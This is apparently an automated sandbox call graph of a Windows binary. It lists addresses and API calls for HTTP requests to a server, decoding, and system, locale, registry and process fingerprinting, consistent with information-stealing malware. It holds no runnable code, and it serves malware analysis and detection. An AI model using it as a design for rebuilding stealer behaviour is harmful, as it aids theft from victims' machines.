14463 88a8a0 lstrcpy 14461->14463 14468 87497f 14463->14468 14464 88a820 2 API calls 14465 874f05 14464->14465 14467 88a9b0 4 API calls 14465->14467 14466 874f27 ctype 14470 88a7a0 lstrcpy 14466->14470 14469 874f1b 14467->14469 14472 88a9b0 4 API calls 14468->14472 14471 88a8a0 lstrcpy 14469->14471 14483 874f57 14470->14483 14471->14466 14473 8749a9 14472->14473 14474 88a8a0 lstrcpy 14473->14474 14475 8749b2 14474->14475 14476 88a9b0 4 API calls 14475->14476 14477 8749d1 14476->14477 14478 88a8a0 lstrcpy 14477->14478 14479 8749da 14478->14479 14480 88a920 3 API calls 14479->14480 14481 8749f8 14480->14481 14482 88a8a0 lstrcpy 14481->14482 14484 874a01 14482->14484 14483->13505 14485 88a9b0 4 API calls 14484->14485 14486 874a20 14485->14486 14487 88a8a0 lstrcpy 14486->14487 14488 874a29 14487->14488 14489 88a9b0 4 API calls 14488->14489 14490 874a48 14489->14490 14491 88a8a0 lstrcpy 14490->14491 14492 874a51 14491->14492 14493 88a9b0 4 API calls 14492->14493 14494 874a7d 14493->14494 14495 88a920 3 API calls 14494->14495 14496 874a84 14495->14496 14497 88a8a0 lstrcpy 14496->14497 14498 874a8d 14497->14498 14499 874aa3 InternetConnectA 14498->14499 14499->14455 14500 874ad3 HttpOpenRequestA 14499->14500 14502 874ebe InternetCloseHandle 14500->14502 14503 874b28 14500->14503 14502->14455 14504 88a9b0 4 API calls 14503->14504 14505 874b3c 14504->14505 14506 88a8a0 lstrcpy 14505->14506 14507 874b45 14506->14507 14508 88a920 3 API calls 14507->14508 14509 874b63 14508->14509 14510 88a8a0 lstrcpy 14509->14510 14511 874b6c 14510->14511 14512 88a9b0 4 API calls 14511->14512 14513 874b8b 14512->14513 14514 88a8a0 lstrcpy 14513->14514 14515 874b94 14514->14515 14516 88a9b0 4 API calls 14515->14516 14517 874bb5 14516->14517 14518 88a8a0 lstrcpy 14517->14518 14519 874bbe 14518->14519 14520 88a9b0 4 API calls 14519->14520 14521 874bde 14520->14521 14522 88a8a0 lstrcpy 14521->14522 14523 874be7 14522->14523 14524 88a9b0 4 API calls 14523->14524 14525 874c06 14524->14525 14526 88a8a0 lstrcpy 14525->14526 14527 874c0f 14526->14527 14528 88a920 3 API calls 14527->14528 14529 874c2d 14528->14529 14530 88a8a0 lstrcpy 14529->14530 14531 874c36 14530->14531 14532 88a9b0 4 API calls 14531->14532 14533 874c55 14532->14533 14534 88a8a0 lstrcpy 14533->14534 14535 874c5e 14534->14535 14536 88a9b0 4 API calls 14535->14536 14537 874c7d 14536->14537 14538 88a8a0 lstrcpy 14537->14538 14539 874c86 14538->14539 14540 88a920 3 API calls 14539->14540 14541 874ca4 14540->14541 14542 88a8a0 lstrcpy 14541->14542 14543 874cad 14542->14543 14544 88a9b0 4 API calls 14543->14544 14545 874ccc 14544->14545 14546 88a8a0 lstrcpy 14545->14546 14547 874cd5 14546->14547 14548 88a9b0 4 API calls 14547->14548 14549 874cf6 14548->14549 14550 88a8a0 lstrcpy 14549->14550 14551 874cff 14550->14551 14552 88a9b0 4 API calls 14551->14552 14553 874d1f 14552->14553 14554 88a8a0 lstrcpy 14553->14554 14555 874d28 14554->14555 14556 88a9b0 4 API calls 14555->14556 14557 874d47 14556->14557 14558 88a8a0 lstrcpy 14557->14558 14559 874d50 14558->14559 14560 88a920 3 API calls 14559->14560 14561 874d6e 14560->14561 14562 88a8a0 lstrcpy 14561->14562 14563 874d77 14562->14563 14564 88a740 lstrcpy 14563->14564 14565 874d92 14564->14565 14566 88a920 3 API calls 14565->14566 14567 874db3 14566->14567 14568 88a920 3 API calls 14567->14568 14569 874dba 14568->14569 14570 88a8a0 lstrcpy 14569->14570 14571 874dc6 14570->14571 14572 874de7 lstrlen 14571->14572 14573 874dfa 14572->14573 14574 874e03 lstrlen 14573->14574 15511 88aad0 14574->15511 14577 874e32 InternetReadFile 14578 874e67 InternetCloseHandle 14577->14578 14583 874e5e 14577->14583 14580 88a800 14578->14580 14580->14502 14581 88a9b0 4 API calls 14581->14583 14582 88a8a0 lstrcpy 14582->14583 14583->14577 14583->14578 14583->14581 14583->14582 14585 88aad0 14584->14585 14586 8817c4 StrCmpCA 14585->14586 14587 8817cf ExitProcess 14586->14587 14588 8817d7 14586->14588 14589 8819c2 14588->14589 14590 8818ad StrCmpCA 14588->14590 14591 8818cf StrCmpCA 14588->14591 14592 88185d StrCmpCA 14588->14592 14593 88187f StrCmpCA 14588->14593 14594 881970 StrCmpCA 14588->14594 14595 8818f1 StrCmpCA 14588->14595 14596 881951 StrCmpCA 14588->14596 14597 881932 StrCmpCA 14588->14597 14598 881913 StrCmpCA 14588->14598 14599 88a820 lstrlen lstrcpy 14588->14599 14589->13507 14590->14588 14591->14588 14592->14588 14593->14588 14594->14588 14595->14588 14596->14588 14597->14588 14598->14588 14599->14588 14601 88a7a0 lstrcpy 14600->14601 14602 875979 14601->14602 14603 8747b0 2 API calls 14602->14603 14604 875985 14603->14604 14605 88a740 lstrcpy 14604->14605 14606 8759ba 14605->14606 14607 88a740 lstrcpy 14606->14607 14608 8759c7 14607->14608 14609 88a740 lstrcpy 14608->14609 14610 8759d4 14609->14610 14611 88a740 lstrcpy 14610->14611 14612 8759e1 14611->14612 14613 88a740 lstrcpy 14612->14613 14614 8759ee InternetOpenA StrCmpCA 14613->14614 14615 875a1d 14614->14615 14616 875fc3 InternetCloseHandle 14615->14616 14618 888b60 3 API calls 14615->14618 14617 875fe0 14616->14617 14621 879ac0 4 API calls 14617->14621 14619 875a3c 14618->14619 14620 88a920 3 API calls 14619->14620 14622 875a4f 14620->14622 14623 875fe6 14621->14623 14624 88a8a0 lstrcpy 14622->14624 14625 88a820 2 API calls 14623->14625 14627 87601f ctype 14623->14627 14629 875a58 14624->14629 14626 875ffd 14625->14626 14628 88a9b0 4 API calls 14626->14628 14631 88a7a0 lstrcpy 14627->14631 14630 876013 14628->14630 14633 88a9b0 4 API calls 14629->14633 14632 88a8a0 lstrcpy 14630->14632 14641 87604f 14631->14641 14632->14627 14634 875a82 14633->14634 14635 88a8a0 lstrcpy 14634->14635 14636 875a8b 14635->14636 14637 88a9b0 4 API calls 14636->14637 14638 875aaa 14637->14638 14639 88a8a0 lstrcpy 14638->14639 14640 875ab3 14639->14640 14642 88a920 3 API calls 14640->14642 14641->13513 14643 875ad1 14642->14643 14644 88a8a0 lstrcpy 14643->14644 14645 875ada 14644->14645 14646 88a9b0 4 API calls 14645->14646 14647 875af9 14646->14647 14648 88a8a0 lstrcpy 14647->14648 14649 875b02 14648->14649 14650 88a9b0 4 API calls 14649->14650 14651 875b21 14650->14651 14652 88a8a0 lstrcpy 14651->14652 14653 875b2a 14652->14653 14654 88a9b0 4 API calls 14653->14654 14655 875b56 14654->14655 14656 88a920 3 API calls 14655->14656 14657 875b5d 14656->14657 14658 88a8a0 lstrcpy 14657->14658 14659 875b66 14658->14659 14660 875b7c InternetConnectA 14659->14660 14660->14616 14661 875bac HttpOpenRequestA 14660->14661 14663 875fb6 InternetCloseHandle 14661->14663 14664 875c0b 14661->14664 14663->14616 14665 88a9b0 4 API calls 14664->14665 14666 875c1f 14665->14666 14667 88a8a0 lstrcpy 14666->14667 14668 875c28 14667->14668 14669 88a920 3 API calls 14668->14669 14670 875c46 14669->14670 14671 88a8a0 lstrcpy 14670->14671 14672 875c4f 14671->14672 14673 88a9b0 4 API calls 14672->14673 14674 875c6e 14673->14674 14675 88a8a0 lstrcpy 14674->14675 14676 875c77 14675->14676 14677 88a9b0 4 API calls 14676->14677 14678 875c98 14677->14678 14679 88a8a0 lstrcpy 14678->14679 14680 875ca1 14679->14680 14681 88a9b0 4 API calls 14680->14681 14682 875cc1 14681->14682 14683 88a8a0 lstrcpy 14682->14683 14684 875cca 14683->14684 14685 88a9b0 4 API calls 14684->14685 14686 875ce9 14685->14686 14687 88a8a0 lstrcpy 14686->14687 14688 875cf2 14687->14688 14689 88a920 3 API calls 14688->14689 14690 875d10 14689->14690 14691 88a8a0 lstrcpy 14690->14691 14692 875d19 14691->14692 14693 88a9b0 4 API calls 14692->14693 14694 875d38 14693->14694 14695 88a8a0 lstrcpy 14694->14695 14696 875d41 14695->14696 14697 88a9b0 4 API calls 14696->14697 14698 875d60 14697->14698 14699 88a8a0 lstrcpy 14698->14699 14700 875d69 14699->14700 14701 88a920 3 API calls 14700->14701 14702 875d87 14701->14702 14703 88a8a0 lstrcpy 14702->14703 14704 875d90 14703->14704 14705 88a9b0 4 API calls 14704->14705 14706 875daf 14705->14706 14707 88a8a0 lstrcpy 14706->14707 14708 875db8 14707->14708 14709 88a9b0 4 API calls 14708->14709 14710 875dd9 14709->14710 14711 88a8a0 lstrcpy 14710->14711 14712 875de2 14711->14712 14713 88a9b0 4 API calls 14712->14713 14714 875e02 14713->14714 14715 88a8a0 lstrcpy 14714->14715 14716 875e0b 14715->14716 14717 88a9b0 4 API calls 14716->14717 14718 875e2a 14717->14718 14719 88a8a0 lstrcpy 14718->14719 14720 875e33 14719->14720 14721 88a920 3 API calls 14720->14721 14722 875e54 14721->14722 14723 88a8a0 lstrcpy 14722->14723 14724 875e5d 14723->14724 14725 875e70 lstrlen 14724->14725 14726 88aad0 14725->14726 14727 875e81 lstrlen GetProcessHeap RtlAllocateHeap 14726->14727 14728 88aad0 14727->14728 14729 875eae lstrlen 14728->14729 14730 875ebe 14729->14730 14731 875ed7 lstrlen 14730->14731 14732 875ee7 14731->14732 14733 875ef0 lstrlen 14732->14733 14734 875f04 14733->14734 14735 875f1a lstrlen 14734->14735 14736 88aad0 14735->14736 14737 875f2a HttpSendRequestA 14736->14737 14738 875f35 InternetReadFile 14737->14738 14739 875f6a InternetCloseHandle 14738->14739 14743 875f61 14738->14743 14739->14663 14741 88a9b0 4 API calls 14741->14743 14742 88a8a0 lstrcpy 14742->14743 14743->14738 14743->14739 14743->14741 14743->14742 14745 881077 14744->14745 14746 881151 14745->14746 14747 88a820 lstrlen lstrcpy 14745->14747 14746->13515 14747->14745 14749 880db7 14748->14749 14750 880f17 14749->14750 14751 880ea4 StrCmpCA 14749->14751 14752 880e27 StrCmpCA 14749->14752 14753 880e67 StrCmpCA 14749->14753 14754 88a820 lstrlen lstrcpy 14749->14754 14750->13523 14751->14749 14752->14749 14753->14749 14754->14749 14757 880f67 14755->14757 14756 881044 14756->13531 14757->14756 14758 880fb2 StrCmpCA 14757->14758 14759 88a820 lstrlen lstrcpy 14757->14759 14758->14757 14759->14757 14761 88a740 lstrcpy 14760->14761 14762 881a26 14761->14762 14763 88a9b0 4 API calls 14762->14763 14764 881a37 14763->14764 14765 88a8a0 lstrcpy 14764->14765 14766 881a40 14765->14766 14767 88a9b0 4 API calls 14766->14767 14768 881a5b 14767->14768 14769 88a8a0 lstrcpy 14768->14769 14770 881a64 14769->14770 14771 88a9b0 4 API calls 14770->14771 14772 881a7d 14771->14772 14773 88a8a0 lstrcpy 14772->14773 14774 881a86 14773->14774 14775 88a9b0 4 API calls 14774->14775 14776 881aa1 14775->14776 14777 88a8a0 lstrcpy 14776->14777 14778 881aaa 14777->14778 14779 88a9b0 4 API calls 14778->14779 14780 881ac3 14779->14780 14781 88a8a0 lstrcpy 14780->14781 14782 881acc 14781->14782 14783 88a9b0 4 API calls 14782->14783 14784 881ae7 14783->14784 14785 88a8a0 lstrcpy 14784->14785 14786 881af0 14785->14786 14787 88a9b0 4 API calls 14786->14787 14788 881b09 14787->14788 14789 88a8a0 lstrcpy 14788->14789 14790 881b12 14789->14790 14791 88a9b0 4 API calls 14790->14791 14792 881b2d 14791->14792 14793 88a8a0 lstrcpy 14792->14793 14794 881b36 14793->14794 14795 88a9b0 4 API calls 14794->14795 14796 881b4f 14795->14796 14797 88a8a0 lstrcpy 14796->14797 14798 881b58 14797->14798 14799 88a9b0 4 API calls 14798->14799 14800 881b76 14799->14800 14801 88a8a0 lstrcpy 14800->14801 14802 881b7f 14801->14802 14803 887500 6 API calls 14802->14803 14804 881b96 14803->14804 14805 88a920 3 API calls 14804->14805 14806 881ba9 14805->14806 14807 88a8a0 lstrcpy 14806->14807 14808 881bb2 14807->14808 14809 88a9b0 4 API calls 14808->14809 14810 881bdc 14809->14810 14811 88a8a0 lstrcpy 14810->14811 14812 881be5 14811->14812 14813 88a9b0 4 API calls 14812->14813 14814 881c05 14813->14814 14815 88a8a0 lstrcpy 14814->14815 14816 881c0e 14815->14816 15518 887690 GetProcessHeap RtlAllocateHeap 14816->15518 14819 88a9b0 4 API calls 14820 881c2e 14819->14820 14821 88a8a0 lstrcpy 14820->14821 14822 881c37 14821->14822 14823 88a9b0 4 API calls 14822->14823 14824 881c56 14823->14824 14825 88a8a0 lstrcpy 14824->14825 14826 881c5f 14825->14826 14827 88a9b0 4 API calls 14826->14827 14828 881c80 14827->14828 14829 88a8a0 lstrcpy 14828->14829 14830 881c89 14829->14830 15525 8877c0 GetCurrentProcess IsWow64Process 14830->15525 14833 88a9b0 4 API calls 14834 881ca9 14833->14834 14835 88a8a0 lstrcpy 14834->14835 14836 881cb2 14835->14836 14837 88a9b0 4 API calls 14836->14837 14838 881cd1 14837->14838 14839 88a8a0 lstrcpy 14838->14839 14840 881cda 14839->14840 14841 88a9b0 4 API calls 14840->14841 14842 881cfb 14841->14842 14843 88a8a0 lstrcpy 14842->14843 14844 881d04 14843->14844 14845 887850 3 API calls 14844->14845 14846 881d14 14845->14846 14847 88a9b0 4 API calls 14846->14847 14848 881d24 14847->14848 14849 88a8a0 lstrcpy 14848->14849 14850 881d2d 14849->14850 14851 88a9b0 4 API calls 14850->14851 14852 881d4c 14851->14852 14853 88a8a0 lstrcpy 14852->14853 14854 881d55 14853->14854 14855 88a9b0 4 API calls 14854->14855 14856 881d75 14855->14856 14857 88a8a0 lstrcpy 14856->14857 14858 881d7e 14857->14858 14859 8878e0 3 API calls 14858->14859 14860 881d8e 14859->14860 14861 88a9b0 4 API calls 14860->14861 14862 881d9e 14861->14862 14863 88a8a0 lstrcpy 14862->14863 14864 881da7 14863->14864 14865 88a9b0 4 API calls 14864->14865 14866 881dc6 14865->14866 14867 88a8a0 lstrcpy 14866->14867 14868 881dcf 14867->14868 14869 88a9b0 4 API calls 14868->14869 14870 881df0 14869->14870 14871 88a8a0 lstrcpy 14870->14871 14872 881df9 14871->14872 15527 887980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14872->15527 14875 88a9b0 4 API calls 14876 881e19 14875->14876 14877 88a8a0 lstrcpy 14876->14877 14878 881e22 14877->14878 14879 88a9b0 4 API calls 14878->14879 14880 881e41 14879->14880 14881 88a8a0 lstrcpy 14880->14881 14882 881e4a 14881->14882 14883 88a9b0 4 API calls 14882->14883 14884 881e6b 14883->14884 14885 88a8a0 lstrcpy 14884->14885 14886 881e74 14885->14886 15529 887a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14886->15529 14889 88a9b0 4 API calls 14890 881e94 14889->14890 14891 88a8a0 lstrcpy 14890->14891 14892 881e9d 14891->14892 14893 88a9b0 4 API calls 14892->14893 14894 881ebc 14893->14894 14895 88a8a0 lstrcpy 14894->14895 14896 881ec5 14895->14896 14897 88a9b0 4 API calls 14896->14897 14898 881ee5 14897->14898 14899 88a8a0 lstrcpy 14898->14899 14900 881eee 14899->14900 15532 887b00 GetUserDefaultLocaleName 14900->15532 14903 88a9b0 4 API calls 14904 881f0e 14903->14904 14905 88a8a0 lstrcpy 14904->14905 14906 881f17 14905->14906 14907 88a9b0 4 API calls 14906->14907 14908 881f36 14907->14908 14909 88a8a0 lstrcpy 14908->14909 14910 881f3f 14909->14910 14911 88a9b0 4 API calls 14910->14911 14912 881f60 14911->14912 14913 88a8a0 lstrcpy 14912->14913 14914 881f69 14913->14914 15536 887b90 14914->15536 14916 881f80 14917 88a920 3 API calls 14916->14917 14918 881f93 14917->14918 14919 88a8a0 lstrcpy 14918->14919 14920 881f9c 14919->14920 14921 88a9b0 4 API calls 14920->14921 14922 881fc6 14921->14922 14923 88a8a0 lstrcpy 14922->14923 14924 881fcf 14923->14924 14925 88a9b0 4 API calls 14924->14925 14926 881fef 14925->14926 14927 88a8a0 lstrcpy 14926->14927 14928 881ff8 14927->14928 15548 887d80 GetSystemPowerStatus 14928->15548 14931 88a9b0 4 API calls 14932 882018 14931->14932 14933 88a8a0 lstrcpy 14932->14933 14934 882021 14933->14934 14935 88a9b0 4 API calls 14934->14935 14936 882040 14935->14936 14937 88a8a0 lstrcpy 14936->14937 14938 882049 14937->14938 14939 88a9b0 4 API calls 14938->14939 14940 88206a 14939->14940 14941 88a8a0 lstrcpy 14940->14941 14942 882073 14941->14942 14943 88207e GetCurrentProcessId 14942->14943 15550 889470 OpenProcess 14943->15550 14946 88a920 3 API calls 14947 8820a4 14946->14947 14948 88a8a0 lstrcpy 14947->14948 14949 8820ad 14948->14949 14950 88a9b0 4 API calls 14949->14950 14951 8820d7 14950->14951 14952 88a8a0 lstrcpy 14951->14952 14953 8820e0 14952->14953 14954 88a9b0 4 API calls 14953->14954 14955 882100 14954->14955 14956 88a8a0 lstrcpy 14955->14956 14957 882109 14956->14957 15555 887e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14957->15555 14960 88a9b0 4 API calls 14961 882129 14960->14961 14962 88a8a0 lstrcpy 14961->14962 14963 882132 14962->14963 14964 88a9b0 4 API calls 14963->14964 14965 882151 14964->14965 14966 88a8a0 lstrcpy 14965->14966 14967 88215a 14966->14967 14968 88a9b0 4 API calls 14967->14968 14969 88217b 14968->14969 14970 88a8a0 lstrcpy 14969->14970 14971 882184 14970->14971 15559 887f60 14971->15559 14974 88a9b0 4 API calls 14975 8821a4 14974->14975 14976 88a8a0 lstrcpy 14975->14976 14977 8821ad 14976->14977 14978 88a9b0 4 API calls 14977->14978 14979 8821cc 14978->14979 14980 88a8a0 lstrcpy 14979->14980 14981 8821d5 14980->14981 14982 88a9b0 4 API calls 14981->14982 14983 8821f6 14982->14983 14984 88a8a0 lstrcpy 14983->14984 14985 8821ff 14984->14985 15572 887ed0 GetSystemInfo wsprintfA 14985->15572 14988 88a9b0 4 API calls 14989 88221f 14988->14989 14990 88a8a0 lstrcpy 14989->14990 14991 882228 14990->14991 14992 88a9b0 4 API calls 14991->14992 14993 882247 14992->14993 14994 88a8a0 lstrcpy 14993->14994 14995 882250 14994->14995 14996 88a9b0 4 API calls 14995->14996 14997 882270 14996->14997 14998 88a8a0 lstrcpy 14997->14998 14999 882279 14998->14999 15574 888100 GetProcessHeap RtlAllocateHeap 14999->15574 15002 88a9b0 4 API calls 15003 882299 15002->15003 15004 88a8a0 lstrcpy 15003->15004 15005 8822a2 15004->15005 15006 88a9b0 4 API calls 15005->15006 15007 8822c1 15006->15007 15008 88a8a0 lstrcpy 15007->15008 15009 8822ca 15008->15009 15010 88a9b0 4 API calls 15009->15010 15011 8822eb 15010->15011 15012 88a8a0 lstrcpy 15011->15012 15013 8822f4 15012->15013 15580 8887c0 15013->15580 15016 88a920 3 API calls 15017 88231e 15016->15017 15018 88a8a0 lstrcpy 15017->15018 15019 882327 15018->15019 15020 88a9b0 4 API calls 15019->15020 15021 882351 15020->15021 15022 88a8a0 lstrcpy 15021->15022 15023 88235a 15022->15023 15024 88a9b0 4 API calls 15023->15024 15025 88237a 15024->15025 15026 88a8a0 lstrcpy 15025->15026 15027 882383 15026->15027 15028 88a9b0 4 API calls 15027->15028 15029 8823a2 15028->15029 15030 88a8a0 lstrcpy 15029->15030 15031 8823ab 15030->15031 15585 8881f0 15031->15585 15033 8823c2 15034 88a920 3 API calls 15033->15034 15035 8823d5 15034->15035 15036 88a8a0 lstrcpy 15035->15036 15037 8823de 15036->15037 15038 88a9b0 4 API calls 15037->15038 15039 88240a 15038->15039 15040 88a8a0 lstrcpy 15039->15040 15041 882413 15040->15041 15042 88a9b0 4 API calls 15041->15042 15043 882432 15042->15043 15044 88a8a0 lstrcpy 15043->15044 15045 88243b 15044->15045 15046 88a9b0 4 API calls 15045->15046 15047 88245c 15046->15047 15048 88a8a0 lstrcpy 15047->15048 15049 882465 15048->15049 15050 88a9b0 4 API calls 15049->15050 15051 882484 15050->15051 15052 88a8a0 lstrcpy 15051->15052 15053 88248d 15052->15053 15054 88a9b0 4 API calls 15053->15054 15055 8824ae 15054->15055 15056 88a8a0 lstrcpy 15055->15056 15057 8824b7 15056->15057 15593 888320 15057->15593 15059 8824d3 15060 88a920 3 API calls 15059->15060 15061 8824e6 15060->15061 15062 88a8a0 lstrcpy 15061->15062 15063 8824ef 15062->15063 15064 88a9b0 4 API calls 15063->15064 15065 882519 15064->15065 15066 88a8a0 lstrcpy 15065->15066 15067 882522 15066->15067 15068 88a9b0 4 API calls 15067->15068 15069 882543 15068->15069 15070 88a8a0 lstrcpy 15069->15070 15071 88254c 15070->15071 15072 888320 17 API calls 15071->15072 15073 882568 15072->15073 15074 88a920 3 API calls 15073->15074 15075 88257b 15074->15075 15076 88a8a0 lstrcpy 15075->15076 15077 882584 15076->15077 15078 88a9b0 4 API calls 15077->15078 15079 8825ae 15078->15079 15080 88a8a0 lstrcpy 15079->15080 15081 8825b7 15080->15081 15082 88a9b0 4 API calls 15081->15082 15083 8825d6 15082->15083 15084 88a8a0 lstrcpy 15083->15084 15085 8825df 15084->15085 15086 88a9b0 4 API calls 15085->15086 15087 882600 15086->15087 15088 88a8a0 lstrcpy 15087->15088 15089 882609 15088->15089 15629 888680 15089->15629 15091 882620 15092 88a920 3 API calls 15091->15092 15093 882633 15092->15093 15094 88a8a0 lstrcpy 15093->15094 15095 88263c 15094->15095 15096 88265a lstrlen 15095->15096 15097 88266a 15096->15097 15098 88a740 lstrcpy 15097->15098 15099 88267c 15098->15099 15100 871590 lstrcpy 15099->15100 15101 88268d 15100->15101 15639 885190 15101->15639 15103 882699 15103->13535 15105 88aad0 15104->15105 15106 875009 InternetOpenUrlA 15105->15106 15107 875021 15106->15107 15108 8750a0 InternetCloseHandle InternetCloseHandle 15107->15108 15109 87502a InternetReadFile 15107->15109 15110 8750ec 15108->15110 15109->15107 15110->13539 15824 8798d0 15111->15824 15113 880759 15114 880a38 15113->15114 15115 88077d 15113->15115 15116 871590 lstrcpy 15114->15116 15118 880799 StrCmpCA 15115->15118 15117 880a49 15116->15117 16000 880250 15117->16000 15120 8807a8 15118->15120 15121 880843 15118->15121 15123 88a7a0 lstrcpy 15120->15123 15124 880865 StrCmpCA 15121->15124 15125 8807c3 15123->15125 15126 880874 15124->15126 15163 88096b 15124->15163 15127 871590 lstrcpy 15125->15127 15129 88a740 lstrcpy 15126->15129 15128 88080c 15127->15128 15130 88a7a0 lstrcpy 15128->15130 15132 880881 15129->15132 15133 880823 15130->15133 15131 88099c StrCmpCA 15134 8809ab 15131->15134 15135 880a2d 15131->15135 15136 88a9b0 4 API calls 15132->15136 15137 88a7a0 lstrcpy 15133->15137 15138 871590 lstrcpy 15134->15138 15135->13543 15139 8808ac 15136->15139 15140 88083e 15137->15140 15141 8809f4 15138->15141 15142 88a920 3 API calls 15139->15142 15827 87fb00 15140->15827 15145 88a7a0 lstrcpy 15141->15145 15143 8808b3 15142->15143 15146 88a9b0 4 API calls 15143->15146 15147 880a0d 15145->15147 15149 8808ba 15146->15149 15148 88a7a0 lstrcpy 15147->15148 15150 880a28 15148->15150 15163->15131 15483 88a7a0 lstrcpy 15482->15483 15484 871683 15483->15484 15485 88a7a0 lstrcpy 15484->15485 15486 871695 15485->15486 15487 88a7a0 lstrcpy 15486->15487 15488 8716a7 15487->15488 15489 88a7a0 lstrcpy 15488->15489 15490 8715a3 15489->15490 15490->14366 15492 8747c6 15491->15492 15493 874838 lstrlen 15492->15493 15494 88aad0 15493->15494 15495 874848 InternetCrackUrlA 15494->15495 15496 874867 15495->15496 15496->14443 15498 88a740 lstrcpy 15497->15498 15499 888b74 15498->15499 15500 88a740 lstrcpy 15499->15500 15501 888b82 GetSystemTime 15500->15501 15502 888b99 15501->15502 15503 88a7a0 lstrcpy 15502->15503 15504 888bfc 15503->15504 15504->14458 15506 88a931 15505->15506 15507 88a988 15506->15507 15509 88a968 lstrcpy lstrcat 15506->15509 15508 88a7a0 lstrcpy 15507->15508 15510 88a994 15508->15510 15509->15507 15510->14461 15512 874e13 HttpSendRequestA 15511->15512 15512->14577 15514 874eee 15513->15514 15515 879af9 LocalAlloc 15513->15515 15514->14464 15514->14466 15515->15514 15516 879b14 CryptStringToBinaryA 15515->15516 15516->15514 15517 879b39 LocalFree 15516->15517 15517->15514 15646 8877a0 15518->15646 15521 881c1e 15521->14819 15522 8876c6 RegOpenKeyExA 15523 887704 RegCloseKey 15522->15523 15524 8876e7 RegQueryValueExA 15522->15524 15523->15521 15524->15523 15526 881c99 15525->15526 15526->14833 15528 881e09 15527->15528 15528->14875 15530 887a9a wsprintfA 15529->15530 15531 881e84 15529->15531 15530->15531 15531->14889 15533 887b4d 15532->15533 15535 881efe 15532->15535 15653 888d20 LocalAlloc CharToOemW 15533->15653 15535->14903 15537 88a740 lstrcpy 15536->15537 15538 887bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15537->15538 15547 887c25 15538->15547 15539 887d18 15541 887d28 15539->15541 15542 887d1e LocalFree 15539->15542 15540 887c46 GetLocaleInfoA 15540->15547 15544 88a7a0 lstrcpy 15541->15544 15542->15541 15543 88a9b0 lstrcpy lstrlen lstrcpy lstrcat 15543->15547 15545 887d37 15544->15545 15545->14916 15546 88a8a0 lstrcpy 15546->15547 15547->15539 15547->15540 15547->15543 15547->15546 15549 882008 15548->15549 15549->14931 15551 889493 GetModuleFileNameExA CloseHandle 15550->15551 15552 8894b5 15550->15552 15551->15552 15553 88a740 lstrcpy 15552->15553 15554 882091 15553->15554 15554->14946 15556 887e68 RegQueryValueExA 15555->15556 15557 882119 15555->15557 15558 887e8e RegCloseKey 15556->15558 15557->14960 15558->15557 15560 887fb9 GetLogicalProcessorInformationEx 15559->15560 15561 887fd8 GetLastError 15560->15561 15565 888029 15560->15565 15562 888022 15561->15562 15571 887fe3 15561->15571 15564 882194 15562->15564 15567 8889f0 2 API calls 15562->15567 15564->14974 15568 8889f0 2 API calls 15565->15568 15567->15564 15569 88807b 15568->15569 15569->15562 15570 888084 wsprintfA 15569->15570 15570->15564 15571->15560 15571->15564 15654 8889f0 15571->15654 15657 888a10 GetProcessHeap RtlAllocateHeap 15571->15657 15573 88220f 15572->15573 15573->14988 15575 8889b0 15574->15575 15576 88814d GlobalMemoryStatusEx 15575->15576 15577 888163 15576->15577 15578 88819b wsprintfA 15577->15578 15579 882289 15578->15579 15579->15002 15581 8887fb GetProcessHeap RtlAllocateHeap wsprintfA 15580->15581 15583 88a740 lstrcpy 15581->15583 15584 88230b 15583->15584 15584->15016 15586 88a740 lstrcpy 15585->15586 15592 888229 15586->15592 15587 888263 15589 88a7a0 lstrcpy 15587->15589 15588 88a9b0 lstrcpy lstrlen lstrcpy lstrcat 15588->15592 15590 8882dc 15589->15590 15590->15033 15591 88a8a0 lstrcpy 15591->15592 15592->15587 15592->15588 15592->15591 15594 88a740 lstrcpy 15593->15594 15595 88835c RegOpenKeyExA 15594->15595 15596 8883ae 15595->15596 15597 8883d0 15595->15597 15598 88a7a0 lstrcpy 15596->15598 15599 8883f8 RegEnumKeyExA 15597->15599 15600 888613 RegCloseKey 15597->15600 15610 8883bd 15598->15610 15601 88860e 15599->15601 15602 88843f wsprintfA RegOpenKeyExA 15599->15602 15603 88a7a0 lstrcpy 15600->15603 15601->15600 15604 8884c1 RegQueryValueExA 15602->15604 15605 888485 RegCloseKey RegCloseKey 15602->15605 15603->15610 15606 8884fa lstrlen 15604->15606 15607 888601 RegCloseKey 15604->15607 15608 88a7a0 lstrcpy 15605->15608 15606->15607 15609 888510 15606->15609 15607->15601 15608->15610 15611 88a9b0 4 API calls 15609->15611 15610->15059 15612 888527 15611->15612 15613 88a8a0 lstrcpy 15612->15613 15614 888533 15613->15614 15615 88a9b0 4 API calls 15614->15615 15616 888557 15615->15616 15617 88a8a0 lstrcpy 15616->15617 15618 888563 15617->15618 15619 88856e RegQueryValueExA 15618->15619 15619->15607 15620 8885a3 15619->15620 15621 88a9b0 4 API calls 15620->15621 15622 8885ba 15621->15622 15623 88a8a0 lstrcpy 15622->15623 15624 8885c6 15623->15624 15625 88a9b0 4 API calls 15624->15625 15626 8885ea 15625->15626 15627 88a8a0 lstrcpy 15626->15627 15628 8885f6 15627->15628 15628->15607 15630 88a740 lstrcpy 15629->15630 15631 8886bc CreateToolhelp32Snapshot Process32First 15630->15631 15632 8886e8 Process32Next 15631->15632 15633 88875d CloseHandle 15631->15633 15632->15633 15638 8886fd 15632->15638 15634 88a7a0 lstrcpy 15633->15634 15635 888776 15634->15635 15635->15091 15636 88a9b0 lstrcpy lstrlen lstrcpy lstrcat 15636->15638 15637 88a8a0 lstrcpy 15637->15638 15638->15632 15638->15636 15638->15637 15640 88a7a0 lstrcpy 15639->15640 15641 8851b5 15640->15641 15642 871590 lstrcpy 15641->15642 15643 8851c6 15642->15643 15658 875100 15643->15658 15645 8851cf 15645->15103 15649 887720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15646->15649 15648 8876b9 15648->15521 15648->15522 15650 887780 RegCloseKey 15649->15650 15651 887765 RegQueryValueExA 15649->15651 15652 887793 15650->15652 15651->15650 15652->15648 15653->15535 15655 8889f9 GetProcessHeap HeapFree 15654->15655 15656 888a0c 15654->15656 15655->15656 15656->15571 15657->15571 15659 88a7a0 lstrcpy 15658->15659 15660 875119 15659->15660 15661 8747b0 2 API calls 15660->15661 15662 875125 15661->15662 15818 888ea0 15662->15818 15664 875184 15665 875192 lstrlen 15664->15665 15666 8751a5 15665->15666 15667 888ea0 4 API calls 15666->15667 